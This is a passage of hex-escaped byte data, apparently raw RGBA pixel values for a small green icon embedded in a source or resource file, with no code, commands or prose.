-\x00\x00\x00\x00\x00\x00\x00\x00\x00\x8d\x30\x00\x00\x8d\xbc\x2d\ -\x00\x8d\xb5\x2a\x29\x8d\xc9\x36\xd4\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3b\xff\x88\xdd\x52\xff\x7d\xf4\x88\ -\xff\x78\xff\xa0\xff\x78\xff\xa1\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa1\xff\x7c\xf7\x8e\xff\x87\xe0\x5a\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xcc\x38\xe7\x8d\xb9\x2c\x42\x8d\xc8\x35\x00\x8d\xa2\x1e\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x8d\xae\x25\x00\x8d\xa3\x1e\ -\x09\x8d\xc4\x33\x9f\x8d\xd2\x3b\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x87\xe0\x5a\xff\x7b\xf9\x92\xff\x78\xff\xa1\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa1\xff\x7a\xfb\x98\ -\xff\x85\xe5\x64\xff\x8d\xd3\x3d\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd2\x3c\xff\x8d\xc7\x35\xbd\x8d\xae\x25\x15\x8d\xb4\x29\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x8d\xa5\x20\x00\x8d\xcd\x39\x00\x8d\xbc\x2e\ -\x54\x8d\xce\x39\xf3\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3b\ -\xff\x87\xe0\x5a\xff\x7a\xfa\x95\xff\x78\xff\xa1\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa1\ -\xff\x79\xfc\x9a\xff\x85\xe4\x63\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd0\x3a\xfc\x8d\xc0\x30\x71\x8d\xff\x79\ -\x00\x8d\xa4\x20\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x8d\xb3\x28\x00\x8d\xae\x25\x13\x8d\xc8\x35\ -\xc0\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3b\xff\x88\xdd\x52\ -\xff\x7b\xf9\x93\xff\x78\xff\xa1\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa1\xff\x7a\xfb\x98\xff\x86\xe1\x5b\xff\x8d\xd3\x3b\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xca\x36\xd5\x8d\xb3\x29\ -\x22\x8d\xb7\x2b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x8d\xa5\x20\x00\x8d\xcf\x39\x00\x8d\xbe\x2f\x5d\x8d\xcf\x3a\ -\xf9\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3b\xff\x8b\xd7\x46\xff\x7d\xf4\x87\ -\xff\x78\xff\xa1\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa1\xff\x7b\xf8\x90\xff\x89\xdb\x4d\ -\xff\x8d\xd3\x3b\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd1\x3b\xfe\x8d\xc1\x31\ -\x79\x8d\xff\x6d\x00\x8d\xa5\x20\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x8d\xaf\x26\x00\x8d\xa6\x21\x0b\x8d\xc7\x35\xb5\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3d\xff\x82\xea\x70\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xf6\x95\xff\x78\xfb\x9c\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa1\xff\x7f\xf0\x7d\ -\xff\x8c\xd5\x40\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xca\x36\ -\xcf\x8d\xb1\x28\x1a\x8d\xb4\x29\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x8d\xbe\x2f\x00\x8d\xba\x2d\x3c\x8d\xce\x39\xee\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd2\x3b\xff\x88\xdd\x53\xff\x7a\xfb\x97\xff\x78\xff\xa1\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa2\xff\x7a\xdd\x78\xff\x79\xe6\x83\xff\x78\xff\xa2\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x79\xfd\x9c\ -\xff\x86\xe2\x5d\xff\x8d\xd2\x3b\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xcf\x3a\ -\xfa\x8d\xbe\x2f\x5b\x8d\xcb\x37\x00\x8d\xa3\x1f\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x8d\xa8\x22\ -\x00\x8d\xff\x5e\x00\x8d\xc3\x32\x81\x8d\xd1\x3b\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd4\x3e\xff\x80\xef\x7b\xff\x78\xff\xa1\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa2\xff\x7a\xd9\x73\xff\x7b\xc5\x5b\xff\x78\xff\xa1\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa1\ -\xff\x7e\xf3\x85\xff\x8c\xd6\x42\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd2\x3c\ -\xff\x8d\xc6\x34\xa5\x8d\x91\x14\x05\x8d\xad\x25\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x8d\xb1\x27\ -\x00\x8d\xaa\x23\x0e\x8d\xc9\x36\xc0\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3b\ -\xff\x89\xdc\x4f\xff\x7a\xfb\x97\xff\x78\xff\xa1\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa2\xff\x7a\xe0\x7b\xff\x7d\xa6\x35\xff\x79\xf5\x95\ -\xff\x78\xff\xa1\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x79\xfd\x9c\xff\x87\xe0\x5a\xff\x8d\xd2\x3b\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xcc\x37\xda\x8d\xb5\x29\x1f\x8d\xb6\x2a\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x8d\xbb\x2d\ -\x00\x8d\xb9\x2c\x2f\x8d\xcd\x38\xe8\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3b\ -\xff\x83\xe8\x6c\xff\x78\xff\xa1\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa2\xff\x79\xe8\x85\xff\x7e\x95\x20\xff\x7a\xdc\x75\ -\xff\x78\xff\xa2\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa1\xff\x80\xee\x7a\xff\x8d\xd4\x3d\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xcf\x3a\xf6\x8d\xbe\x2f\x49\x8d\xc2\x32\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x8d\xa0\x1e\x00\x8d\xc9\x36\ -\x00\x8d\xc0\x30\x5a\x8d\xd0\x3a\xfb\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8c\xd5\x41\ -\xff\x7d\xf4\x87\xff\x78\xff\xa1\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa1\xff\x79\xee\x8c\xff\x7e\x93\x1e\xff\x7c\xb7\x49\ -\xff\x78\xfe\x9f\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa1\xff\x7b\xf8\x91\xff\x8b\xd8\x47\xff\x8d\xd3\x3b\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd1\x3b\xff\x8d\xc3\x32\x77\x8d\xde\x43\x00\x8d\xa7\x21\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x8d\xa8\x22\x00\x8d\xf0\x4e\ -\x00\x8d\xc4\x33\x81\x8d\xd2\x3b\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3b\xff\x89\xdb\x4e\ -\xff\x7a\xfb\x97\xff\x78\xff\xa1\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa1\xff\x79\xf3\x92\xff\x7e\x99\x25\xff\x7e\x97\x23\ -\xff\x79\xf0\x8e\xff\x78\xff\xa1\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x79\xfd\x9c\xff\x87\xdf\x57\xff\x8d\xd2\x3b\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xc7\x35\xa0\x8d\x60\x00\x02\x8d\xac\x25\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x8d\xac\x24\x00\x8d\x50\x00\ -\x02\x8d\xc7\x35\x9f\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd2\x3a\xff\x86\xe1\x5d\ -\xff\x78\xfe\x9e\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa1\xff\x78\xf7\x97\xff\x7e\xa0\x2e\xff\x7f\x87\x0f\ -\xff\x7b\xd2\x6a\xff\x78\xff\xa2\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x84\xe6\x68\xff\x8d\xd2\x3b\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xca\x36\xbe\x8d\xa9\x22\x0b\x8d\xb0\x27\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x8d\xaf\x26\x00\x8d\xa0\x1d\ -\x07\x8d\xc9\x36\xb4\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd2\x3b\xff\x84\xe7\x69\ -\xff\x78\xff\xa1\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xfb\x9b\xff\x7d\xa8\x37\xff\x7f\x83\x0b\ -\xff\x7d\xae\x3e\xff\x78\xfc\x9c\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa2\xff\x81\xed\x76\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xcc\x38\xd2\x8d\xb3\x29\x16\x8d\xb4\x29\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x8d\xb1\x27\x00\x8d\xac\x24\ -\x0d\x8d\xcb\x37\xc2\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3b\xff\x82\xeb\x72\ -\xff\x78\xff\xa1\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xfd\x9e\xff\x7d\xb0\x40\xff\x7f\x84\x0c\ -\xff\x7e\x92\x1d\xff\x79\xe9\x86\xff\x78\xff\xa2\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa2\xff\x7f\xf1\x80\xff\x8d\xd4\x3e\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xcd\x38\xdd\x8d\xb7\x2b\x1f\x8d\xb8\x2b\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x8d\xb3\x28\x00\x8d\xb0\x27\ -\x10\x8d\xcb\x37\xc9\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x81\xed\x76\ -\xff\x78\xff\xa2\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa2\ -\xff\x78\xff\xa1\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x7c\xb8\x4a\xff\x7f\x85\x0d\ -\xff\x7f\x87\x0f\xff\x7b\xc8\x5e\xff\x78\xff\xa2\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa2\xff\x7e\xf2\x83\xff\x8c\xd4\x3f\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xce\x39\xe1\x8d\xb9\x2c\x23\x8d\xba\x2c\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\ -\x00\x00\x00\x00\x00\x00\x00\x00\x00\x8d\xb3\x29\x00\x8d\xb1\x27\ -\x11\x8d\xcc\x37\xca\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\ -\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x8d\xd3\x3c\xff\x81\xed\x77\ -\xff\x78\xff\xa2\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\xff\x78\xff\xa0\ -\xff\x78\xff\xa0\xff\x78\xff\xa1\xff\x79\xe7\x84\xff\x7b\xcf\x67\ -\xff\x79\xef\x8d\xff\x78\xfe\x9f\xff\x78\xff\xa2\xff\x78\xff\xa1\ -\xff\x78\xff\xa0\xff\x78\xff\xa1\xff\x7c\xc0\x54\xff\x7f\x85\x0d\ 